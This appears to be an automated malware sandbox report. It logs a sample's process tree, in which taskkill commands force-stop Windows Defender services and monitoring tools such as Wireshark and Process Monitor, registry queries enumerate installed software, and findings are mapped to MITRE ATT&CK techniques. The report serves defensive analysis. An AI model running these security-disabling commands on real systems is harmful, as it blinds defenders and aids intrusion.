"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
2⤵
- Kills process with taskkill
PID:1860

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:2988

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
3⤵
PID:3792

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
3⤵
PID:540

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:2272

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
3⤵
PID:1216

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
3⤵
PID:752

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:3640

C:\Windows\System32\Wbem\WMIC.exe
wmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
3⤵
PID:3304

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:3796

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
3⤵
PID:3792

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
3⤵
PID:540

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:3824

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
3⤵
PID:808

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
3⤵
PID:848

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:1224

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
3⤵
PID:808

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
3⤵
PID:4112

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
2⤵
- Kills process with taskkill
PID:3744

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4164

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
3⤵
PID:4208

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
3⤵
PID:4224

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4244

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
3⤵
PID:4280

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
3⤵
PID:4300

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4324

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
3⤵
PID:4360

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
3⤵
PID:4380

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4400

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
3⤵
PID:4480

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
3⤵
PID:4508

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
2⤵
- Kills process with taskkill
PID:4416

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4540

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
3⤵
PID:4576

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
3⤵
PID:4596

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4616

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
3⤵
PID:4652

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
3⤵
PID:4672

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4692

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
3⤵
PID:4728

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
3⤵
PID:4748

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4768

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
3⤵
PID:4804

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
3⤵
PID:4824

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4844

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
3⤵
PID:4880

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
3⤵
PID:4900

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4920

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
3⤵
PID:4956

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
3⤵
PID:4976

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4996

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
3⤵
PID:5032

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
3⤵
PID:5052

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:5072

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
3⤵
PID:5108

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
3⤵
PID:1956

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4136

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
3⤵
PID:4220

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
3⤵
PID:4232

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
2⤵
- Kills process with taskkill
PID:4156

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4252

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
3⤵
PID:2052

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
3⤵
PID:4284

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4312

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
3⤵
PID:4376

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
3⤵
PID:4392

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4432

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
3⤵
PID:4536

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
3⤵
PID:4556

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4420

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
3⤵
PID:4584

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
3⤵
PID:4576

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4624

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
3⤵
PID:4688

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
3⤵
PID:4736

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4728

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
3⤵
PID:4816

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
3⤵
PID:4840

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4888

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
3⤵
PID:4900

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
3⤵
PID:4968

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4992

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
3⤵
PID:5060

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
3⤵
PID:5080

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:848

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
3⤵
PID:4152

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
3⤵
PID:4160

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4236

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
3⤵
PID:2892

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
3⤵
PID:1860

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4156

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
3⤵
PID:4308

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
3⤵
PID:4372

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4412

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
3⤵
PID:4536

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
3⤵
PID:4556

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4604

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
3⤵
PID:4672

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
3⤵
PID:4744

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:4764

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
3⤵
PID:4860

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
3⤵
PID:4936

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
2⤵
- Kills process with taskkill
PID:4900

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:5012

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
3⤵
PID:4188

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
3⤵
PID:4240

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:3304

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
3⤵
PID:4100

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
3⤵
PID:4360

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
2⤵
- Kills process with taskkill
PID:4444

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
2⤵
- Kills process with taskkill
PID:4584

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
2⤵
- Kills process with taskkill
PID:4852

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
2⤵
- Kills process with taskkill
PID:4140

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
2⤵
- Kills process with taskkill
PID:4220

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
2⤵
- Kills process with taskkill
PID:4308

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
2⤵
- Kills process with taskkill
PID:4424

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
2⤵
- Kills process with taskkill
PID:4684

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
2⤵
- Kills process with taskkill
PID:4972

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
2⤵
- Kills process with taskkill
PID:3740

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\.ntusernt.ini

Download Submit
C:\Users\Admin\ujTBR\Desktop.ini

Download Submit
C:\Users\Admin\ujTBR\NXtxm.class

Download Submit
\Users\Admin\AppData\Local\Temp\UxFqUFhDWc5363647669437565251.xml

Download Submit
memory/396-91-0x0000000000000000-mapping.dmp

Download
memory/472-107-0x0000000000000000-mapping.dmp

Download
memory/508-106-0x0000000000000000-mapping.dmp

Download
memory/508-75-0x0000000000000000-mapping.dmp

Download
memory/540-164-0x0000000000000000-mapping.dmp

Download
memory/540-154-0x0000000000000000-mapping.dmp

Download
memory/556-78-0x0000000000000000-mapping.dmp

Download
memory/572-146-0x0000000000000000-mapping.dmp

Download
memory/632-60-0x0000000000000000-mapping.dmp

Download
memory/636-109-0x0000000000000000-mapping.dmp

Download
memory/740-129-0x0000000000000000-mapping.dmp

Download
memory/744-52-0x0000000000000000-mapping.dmp

Download
memory/752-160-0x0000000000000000-mapping.dmp

Download
memory/752-133-0x0000000000000000-mapping.dmp

Download
memory/752-150-0x0000000000000000-mapping.dmp

Download
memory/804-61-0x0000000000000000-mapping.dmp

Download
memory/808-169-0x0000000000000000-mapping.dmp

Download
memory/808-166-0x0000000000000000-mapping.dmp

Download
memory/844-79-0x0000000000000000-mapping.dmp

Download
memory/848-167-0x0000000000000000-mapping.dmp

Download
memory/848-241-0x0000000000000000-mapping.dmp

Download
memory/900-121-0x0000000000000000-mapping.dmp

Download
memory/992-77-0x0000000000000000-mapping.dmp

Download
memory/1004-108-0x0000000000000000-mapping.dmp

Download
memory/1004-62-0x0000000000000000-mapping.dmp

Download
memory/1020-63-0x0000000000000000-mapping.dmp

Download
memory/1100-104-0x0000000000000000-mapping.dmp

Download
memory/1100-88-0x0000000000000000-mapping.dmp

Download
memory/1164-82-0x0000000000000000-mapping.dmp

Download
memory/1208-64-0x0000000000000000-mapping.dmp

Download
memory/1216-156-0x0000000000000000-mapping.dmp

Download
memory/1224-143-0x0000000000000000-mapping.dmp

Download
memory/1224-168-0x0000000000000000-mapping.dmp

Download
memory/1252-98-0x0000000000000000-mapping.dmp

Download
memory/1332-124-0x0000000000000000-mapping.dmp

Download
memory/1336-65-0x0000000000000000-mapping.dmp

Download
memory/1364-131-0x0000000000000000-mapping.dmp

Download
memory/1364-94-0x0000000000000000-mapping.dmp

Download
memory/1520-86-0x0000000000000000-mapping.dmp

Download
memory/1580-127-0x0000000000000000-mapping.dmp

Download
memory/1748-111-0x0000000000000000-mapping.dmp

Download
memory/1812-99-0x0000000000000000-mapping.dmp

Download
memory/1828-144-0x0000000000000000-mapping.dmp

Download
memory/1860-246-0x0000000000000000-mapping.dmp

Download
memory/1860-132-0x0000000000000000-mapping.dmp

Download
memory/1860-148-0x0000000000000000-mapping.dmp

Download
memory/1908-137-0x0000000000000000-mapping.dmp

Download
memory/1940-74-0x0000000000000000-mapping.dmp

Download
memory/1956-212-0x0000000000000000-mapping.dmp

Download
memory/2052-218-0x0000000000000000-mapping.dmp

Download
memory/2084-120-0x0000000000000000-mapping.dmp

Download
memory/2124-113-0x0000000000000000-mapping.dmp

Download
memory/2156-68-0x0000000000000000-mapping.dmp

Download
memory/2272-142-0x0000000000000000-mapping.dmp

Download
memory/2272-155-0x0000000000000000-mapping.dmp

Download
memory/2276-50-0x0000000000000000-mapping.dmp

Download
memory/2448-92-0x0000000000000000-mapping.dmp

Download
memory/2512-147-0x0000000000000000-mapping.dmp

Download
memory/2524-96-0x0000000000000000-mapping.dmp

Download
memory/2560-87-0x0000000000000000-mapping.dmp

Download
memory/2560-102-0x0000000000000000-mapping.dmp

Download
memory/2596-136-0x0000000000000000-mapping.dmp

Download
memory/2688-130-0x0000000000000000-mapping.dmp

Download
memory/2716-80-0x00007FFA23F00000-0x00007FFA248EC000-memory.dmp

Filesize
9.9MB

Download
memory/2716-69-0x0000000000000000-mapping.dmp

Download
memory/2716-110-0x000001AF76980000-0x000001AF76981000-memory.dmp

Filesize
4KB

Download
memory/2716-95-0x000001AF767D0000-0x000001AF767D1000-memory.dmp

Filesize
4KB

Download
memory/2720-70-0x0000000000000000-mapping.dmp

Download
memory/2756-89-0x0000000000000000-mapping.dmp

Download
memory/2776-71-0x0000000000000000-mapping.dmp

Download
memory/2876-83-0x0000000000000000-mapping.dmp

Download
memory/2892-245-0x0000000000000000-mapping.dmp

Download
memory/2964-128-0x0000000000000000-mapping.dmp

Download
memory/2988-123-0x0000000000000000-mapping.dmp

Download
memory/2988-152-0x0000000000000000-mapping.dmp

Download
memory/2996-84-0x0000000000000000-mapping.dmp

Download
memory/3152-138-0x0000000000000000-mapping.dmp

Download
memory/3152-126-0x0000000000000000-mapping.dmp

Download
memory/3168-116-0x0000000000000000-mapping.dmp

Download
memory/3168-54-0x0000000000000000-mapping.dmp

Download
memory/3304-151-0x0000000000000000-mapping.dmp

Download
memory/3304-161-0x0000000000000000-mapping.dmp

Download
memory/3304-122-0x0000000000000000-mapping.dmp

Download
memory/3304-263-0x0000000000000000-mapping.dmp

Download
memory/3308-119-0x0000000000000000-mapping.dmp

Download
memory/3400-85-0x0000000000000000-mapping.dmp

Download
memory/3468-134-0x0000000000000000-mapping.dmp

Download
memory/3468-57-0x0000000000000000-mapping.dmp

Download
memory/3604-103-0x0000000000000000-mapping.dmp

Download
memory/3616-118-0x0000000000000000-mapping.dmp

Download
memory/3616-81-0x0000000000000000-mapping.dmp

Download
memory/3640-158-0x0000000000000000-mapping.dmp

Download
memory/3740-112-0x0000000000000000-mapping.dmp

Download
memory/3740-275-0x0000000000000000-mapping.dmp

Download
memory/3744-170-0x0000000000000000-mapping.dmp

Download
memory/3748-53-0x0000000000000000-mapping.dmp

Download
memory/3788-115-0x0000000000000000-mapping.dmp

Download
memory/3792-163-0x0000000000000000-mapping.dmp

Download
memory/3792-153-0x0000000000000000-mapping.dmp

Download
memory/3796-162-0x0000000000000000-mapping.dmp

Download
memory/3800-76-0x0000000000000000-mapping.dmp

Download
memory/3800-93-0x0000000000000000-mapping.dmp

Download
memory/3808-105-0x0000000000000000-mapping.dmp

Download
memory/3824-145-0x0000000000000000-mapping.dmp

Download
memory/3824-165-0x0000000000000000-mapping.dmp

Download
memory/3832-101-0x0000000000000000-mapping.dmp

Download
memory/3832-114-0x0000000000000000-mapping.dmp

Download
memory/3836-140-0x0000000000000000-mapping.dmp

Download
memory/3860-90-0x0000000000000000-mapping.dmp

Download
memory/3880-72-0x0000000000000000-mapping.dmp

Download
memory/3880-100-0x0000000000000000-mapping.dmp

Download
memory/3912-55-0x0000000000000000-mapping.dmp

Download
memory/3932-141-0x0000000000000000-mapping.dmp

Download
memory/3980-97-0x0000000000000000-mapping.dmp

Download
memory/3980-51-0x0000000000000000-mapping.dmp

Download
memory/4000-125-0x0000000000000000-mapping.dmp

Download
memory/4024-135-0x0000000000000000-mapping.dmp

Download
memory/4100-264-0x0000000000000000-mapping.dmp

Download
memory/4112-171-0x0000000000000000-mapping.dmp

Download
memory/4136-213-0x0000000000000000-mapping.dmp

Download
memory/4140-269-0x0000000000000000-mapping.dmp

Download
memory/4152-242-0x0000000000000000-mapping.dmp

Download
memory/4156-215-0x0000000000000000-mapping.dmp

Download
memory/4156-247-0x0000000000000000-mapping.dmp

Download
memory/4160-243-0x0000000000000000-mapping.dmp

Download
memory/4164-173-0x0000000000000000-mapping.dmp

Download
memory/4188-261-0x0000000000000000-mapping.dmp

Download
memory/4208-174-0x0000000000000000-mapping.dmp

Download
memory/4220-270-0x0000000000000000-mapping.dmp

Download
memory/4220-214-0x0000000000000000-mapping.dmp

Download
memory/4224-175-0x0000000000000000-mapping.dmp

Download
memory/4232-216-0x0000000000000000-mapping.dmp

Download
memory/4236-244-0x0000000000000000-mapping.dmp

Download
memory/4240-262-0x0000000000000000-mapping.dmp

Download
memory/4244-176-0x0000000000000000-mapping.dmp

Download
memory/4252-217-0x0000000000000000-mapping.dmp

Download
memory/4280-177-0x0000000000000000-mapping.dmp

Download
memory/4284-219-0x0000000000000000-mapping.dmp

Download
memory/4300-178-0x0000000000000000-mapping.dmp

Download
memory/4308-248-0x0000000000000000-mapping.dmp

Download
memory/4308-271-0x0000000000000000-mapping.dmp

Download
memory/4312-220-0x0000000000000000-mapping.dmp

Download
memory/4324-181-0x0000000000000000-mapping.dmp

Download
memory/4360-265-0x0000000000000000-mapping.dmp

Download
memory/4360-182-0x0000000000000000-mapping.dmp

Download
memory/4372-249-0x0000000000000000-mapping.dmp

Download
memory/4376-221-0x0000000000000000-mapping.dmp

Download
memory/4380-183-0x0000000000000000-mapping.dmp

Download
memory/4392-222-0x0000000000000000-mapping.dmp

Download
memory/4400-184-0x0000000000000000-mapping.dmp

Download
memory/4412-250-0x0000000000000000-mapping.dmp

Download
memory/4416-186-0x0000000000000000-mapping.dmp

Download
memory/4420-226-0x0000000000000000-mapping.dmp

Download
memory/4424-272-0x0000000000000000-mapping.dmp

Download
memory/4432-223-0x0000000000000000-mapping.dmp

Download
memory/4444-266-0x0000000000000000-mapping.dmp

Download
memory/4480-187-0x0000000000000000-mapping.dmp

Download
memory/4508-188-0x0000000000000000-mapping.dmp

Download
memory/4536-224-0x0000000000000000-mapping.dmp

Download
memory/4536-251-0x0000000000000000-mapping.dmp

Download
memory/4540-189-0x0000000000000000-mapping.dmp

Download
memory/4556-225-0x0000000000000000-mapping.dmp

Download
memory/4556-252-0x0000000000000000-mapping.dmp

Download
memory/4576-190-0x0000000000000000-mapping.dmp

Download
memory/4576-228-0x0000000000000000-mapping.dmp

Download
memory/4584-267-0x0000000000000000-mapping.dmp

Download
memory/4584-227-0x0000000000000000-mapping.dmp

Download
memory/4596-191-0x0000000000000000-mapping.dmp

Download
memory/4604-253-0x0000000000000000-mapping.dmp

Download
memory/4616-192-0x0000000000000000-mapping.dmp

Download
memory/4624-229-0x0000000000000000-mapping.dmp

Download
memory/4652-193-0x0000000000000000-mapping.dmp

Download
memory/4672-194-0x0000000000000000-mapping.dmp

Download
memory/4672-254-0x0000000000000000-mapping.dmp

Download
memory/4684-273-0x0000000000000000-mapping.dmp

Download
memory/4688-230-0x0000000000000000-mapping.dmp

Download
memory/4692-195-0x0000000000000000-mapping.dmp

Download
memory/4728-232-0x0000000000000000-mapping.dmp

Download
memory/4728-196-0x0000000000000000-mapping.dmp

Download
memory/4736-231-0x0000000000000000-mapping.dmp

Download
memory/4744-255-0x0000000000000000-mapping.dmp

Download
memory/4748-197-0x0000000000000000-mapping.dmp

Download
memory/4764-256-0x0000000000000000-mapping.dmp

Download
memory/4768-198-0x0000000000000000-mapping.dmp

Download
memory/4804-199-0x0000000000000000-mapping.dmp

Download
memory/4816-233-0x0000000000000000-mapping.dmp

Download
